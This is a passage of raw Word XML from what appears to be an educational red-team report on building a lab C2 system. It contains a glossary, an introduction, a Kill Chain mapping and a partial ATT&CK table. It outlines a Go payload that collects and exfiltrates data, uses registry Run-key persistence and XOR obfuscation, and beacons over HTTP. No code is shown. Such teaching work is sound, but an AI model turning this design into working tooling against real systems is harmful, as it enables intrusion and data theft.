            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66B3EE7C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="1FD0F6F2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9E6AF8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc226583742"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Glossary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="0E7A89C2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E038CE7"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C0DF0" w14:paraId="2DA9B7A4"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4140F3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Term / Acronym</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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658B9D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0BF15E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6CB7E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ATT&amp;CK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99477" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Adversarial Tactics, Techniques, and Common Knowledge — MITRE's knowledge base of adversary behaviour.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="4828D2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36F6C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2 / C&amp;C</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65EA0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Command and Control — infrastructure used by an attacker to communicate with and direct compromised systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="058DB9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3EF13" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cyber Kill Chain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786DD" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">A seven-stage intrusion model developed by Lockheed Martin describing the phases of a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cyber attack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="68348F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1C096A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EDR</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1FB5B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Endpoint Detection and Response — security software that monitors endpoints for malicious activity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="137EE9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C3980" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Go / Golang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6BA1E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>An open-source statically compiled programming language developed by Google, commonly used in offensive tooling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0D3EB6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DA7E3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HKCU</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E6D96" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HKEY_CURRENT_USER — a Windows registry hive storing per-user configuration data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="7EE2BE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9E593" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP POST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8FA9A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>An HTTP method used to send data to a server; used in this project for C2 beacon transmissions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="50D670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C4B51D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE</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4F9F8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A US non-profit that maintains the ATT&amp;CK framework and other cybersecurity resources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="57F4A8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9E9A0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OPSEC</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48E52" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Operations Security — practices used to protect information about an operation from adversaries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="5AB635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2C4A5" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Payload</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EDA36" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>In this context, the compiled Go binary that executes on the target VM to collect and exfiltrate data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="37B5D5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FD203" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Persistence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87464" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A technique used to maintain access to a compromised system across reboots or logouts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0ABD73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61425" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SIEM</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CFB0C7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Security Information and Event Management — a system that aggregates and analyses security logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0ACD9B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3FB79" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon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31E49" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>System Monitor — a Windows system service that logs detailed process, network, and file activity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="4E55D4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EAF4F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TTP</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81FB8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tactics, Techniques, and Procedures — the behaviours and methods used by a threat actor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="2A4DD5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ABE7D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VM / VirtualBox</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A9C5F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Virtual Machine — an isolated software-based computer used for safe payload detonation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="2016D6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6E690" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WSGI</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7D6C4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Server Gateway Interface — a Python standard for web server communication; used by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Gunicorn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/Flask.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="6BB90E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AEB0E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>XOR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84B2F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exclusive OR — a bitwise operation used here for simple string obfuscation of C2 artefacts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="356A9ECC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="565ACB0E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:sectPr w:rsidR="002C0DF0">
          <w:headerReference w:type="default" r:id="rId7"/>
          <w:footerReference w:type="default" r:id="rId8"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742CB4D8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc226583743"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="7222BDB9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D55AC4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="4907F515" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Modern cyber threats rely on multi-stage methodologies — reconnaissance, initial access, persistence, command and control communication, and lateral movement. Understanding these stages from the attacker's perspective is critical for cybersecurity professionals in both offensive and defensive roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51520556" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="52A3A4DC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This project implements a simplified educational C2 structure to simulate real-world attack chains in a controlled environment. The research focuses not only on how such systems operate technically, but on how they can be detected, prevented, and mitigated. Every offensive technique demonstrated is paired with the corresponding detection method a blue team would use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF865FC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="566D5B1F" w14:textId="79D38D6D" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All work is conducted within an isolated lab. The project is framed as a red team exercise with explicit blue team analysis at every stage. The code is available as downloadable versioned files through the </w:t>
      </w:r>
      <w:r w:rsidR="00ED54EA">
        <w:t>downloadable links on the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4DA7BA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="0A2860E4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="4A19C7E5" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc226583744"/>
      <w:r>
        <w:t>2. Background and Theory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="5A167774" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF1801F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="0DCCFD15" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc226583745"/>
      <w:r>
        <w:t>2.1  The Cyber Kill Chain</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="0C15BD9D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The Cyber Kill Chain (Lockheed Martin, Hutchins et al., 2011) is a seven-stage model describing how an intrusion unfolds from the attacker's perspective. It provides a structural framework for this project — every phase of development maps to a specific Kill Chain stage, making the project objectives concrete and academically grounded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3917DF3E"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C0DF0" w14:paraId="0A5E299B"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DC11A2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kill Chain Stage</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9D51F7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Project Coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="5772E73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ECD9D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1. Reconnaissance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2E39E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase 02 — v1, v2, v3 payload data collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="55CEACB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1DC388" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2. Weaponization</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33757" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase 01–02 — Go source compiled to static .exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="43069D4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3E2F5" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3. Delivery</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6B6FC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Out of scope — lab environment only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="50774B19"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CC0AA0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4. Exploitation</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07C90" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Out of scope — manual execution in VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="2E53CF5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8CD10" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5. Installation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F942A" w14:textId="68228BC3" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase 02 v3 — HKCU</w:t>
            </w:r>
            <w:r w:rsidR="00ED54EA">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">(only needs standard use </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00ED54EA">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>rperms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00ED54EA">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> not admin perms like “HKEY”)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Registry Run key </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED54EA">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="28FB8B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5623E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6. Command &amp; Control</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6BC1D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase 03 — Flask listener, HTTP beaconing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0183E68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D442C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7. Actions on Objectives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D3555" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Out of scope — collection only, no impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C30A5E9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="3159AAB2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="57F645CE" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc226583746"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.2  MITRE ATT&amp;CK Framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="1DE0D331" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE ATT&amp;CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. Where the Kill Chain provides the campaign structure, ATT&amp;CK provides granular technique IDs that map each specific capability to a documented adversary behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5512D318"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2726"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C0DF0" w14:paraId="05E2E74A"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3926D2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Technique ID</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931DBC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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E867CD" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Project Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="49E676B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FA940" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1082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CF2FC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>System Information Discovery</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2AA28" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recon v1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="4E041B9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4BDBF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1016</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00083" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>System Network Configuration Discovery</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056EF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recon v1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="5CEA0A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43B91" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1049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DE1DF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
